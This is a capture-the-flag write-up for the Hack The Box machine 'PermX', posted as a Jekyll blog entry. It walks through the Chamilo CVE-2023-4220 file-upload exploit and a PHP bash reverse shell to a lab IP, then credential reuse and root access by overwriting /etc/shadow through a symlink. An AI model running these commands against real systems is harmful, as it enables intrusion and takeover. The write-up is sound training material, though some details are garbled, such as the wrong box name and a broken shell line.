mmckinnon/chirpy-starter
1
0
Fork 0
mirror of https://github.com/cotes2020/chirpy-starter.git synced 2025-04-21 11:53:27 +10:00
Code Issues Actions Packages Projects Releases Wiki Activity
chirpy-starter/_posts/2024-01-05-permx.md
racc0x 6278b1b310 update-2025
2025-02-03 22:22:27 -06:00

167 lines
4.6 KiB
Markdown
Raw Blame History

---
title: HTB - PermX
date: 2023-06-07 12:17:34 -0400
categories: [hackthebox , PermX]
tags: [HackTheBox,Chamilo LMS,CVE-2023-4220,mysql,symlink,curl ]
image:
path: /assets/img/post/permx/PermX.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - PermX.
---
## Box Info
| Name | Bizness |
| :-------------------- | ---------------: |
| Release Date | 20 Jun, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## Enumeration
### Nmap
![Image](/assets/img/post/permx/image.png)
#### whatweb:
![Image](/assets/img/post/permx/2.png)
#### Wappalyzer
![Image](/assets/img/post/permx/4.png)
### Web
![Image](/assets/img/post/permx/3.png)
#### Brute Forcing directory
I use
```bash
dirsearch -u http://permx.htb/
```
but i dont find anything interesting, So i use the Scan for Subdomain
#### SubDomain
```bash
wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H "Host: FUZZ.permx.htb" -u http://permx.htb -t 100
```
![Image](/assets/img/post/permx/5.png)
Search for chamilo in google.
### Chamilo LMS - CVE-2023-4220
![Image](/assets/img/post/permx/6.png)
RCE:
```bash
echo '<?php system("bash -c 'bash -i >& /dev/tcp/10.10.10.13/9001 0>&'"); ?>' > rce.php
```
```bash
curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
`The file has successfully been uploaded.`
```
```bash
curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'
`uid=33(www-data) gid=33(www-data) groups=33(www-data)`
```
![Image](/assets/img/post/permx/7.png)
We go to open the file through web.
![Image](/assets/img/post/permx/8.png)
Execute the file .php `http://lms.permx.htb//main/inc/lib/javascript/bigupload/files/rce.php` with `lvwrap nc -lvnp 7777` listening for get the reverse shell
![Image](/assets/img/post/permx/9.png)
taadaaa... Well, we login as `www-data` and we go to enumerate...
I found in config folder a file `configuration.php` and show it us a user and password.
Till now we have one user:`chamilo` and password:`03f6lY3uXAP2...`.
![Image](/assets/img/post/permx/10.png)
`netstat -nlp` or `netstat -ano` and we see one port strange and is port 3306 it is open for the database.
![Image](/assets/img/post/permx/11.png)
Use the mysql inside in the victim machine.
```bash
mysql -uchamilo -p and the password 03F6lY3uXAP2bkW8
```
![Image](/assets/img/post/permx/12.png)
```text
show databases;
use chamilo;
describe user;
select user_id,username,firstname,lastname,password,salt from user;
```
![Image](/assets/img/post/permx/13.png)
We login with ssh `mtz@permx.htb` and password `03F6lY3uXAP2bkW8`
![Image](/assets/img/post/permx/14.png)
`sudo -l`
![Image](/assets/img/post/permx/15.png)
## Symlink (Symbolic Link Attack)
The directory `/etc/init.d`{: .filepath} is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`{: .filepath}. An alternative path in Redhat systems is `/etc/rc.d/init.d`{: .filepath}.
Its main function is to change all file permissions, but it must be in the `/home/mtz` directory.
![Image](/assets/img/post/permx/16.png)
[Symlink Español](https://www.freecodecamp.org/espanol/news/tutorial-de-enlace-simbolico-en-linux-como-crear-y-remover-un-enlace-simbolico/)
[Symlink Hacktricks](https://book.hacktricks.xyz/pentesting-web/file-upload#symlink)
```bash
link soft / to cc
ln -s / cc
```
Create a folder that points to the root path with Symlink with the -s (soft) option to locate ourselves inside it and make changes to `/etc/shadow`{: .filepath} (root password) with a password that we create ourselves (cccc).
![Image](/assets/img/post/permx/17.png)
The `/etc/shadow`{: .filepath} storage the password of root
```bash
sudo /opt/acl.sh mtz rwx /home/mtz/etc/shadow (execute the script for change the permissions)
```
![Image](/assets/img/post/permx/18.png)
Generated a password for remplace the root password in `/etc/shadow`{: .filepath}
```bash
openssl passwd -6 cccc
```
![Image](/assets/img/post/permx/19.png)
and copy and paste en the file `"shadow"`
```bash
echo 'root: {password generate}:19871:0:99999:7:::' > /home/mtz/cc/etc/shadow
```
Login as root with password cccc
![Image](/assets/img/post/permx/20.png)
`Root`
Reference in New Issue View Git Blame Copy Permalink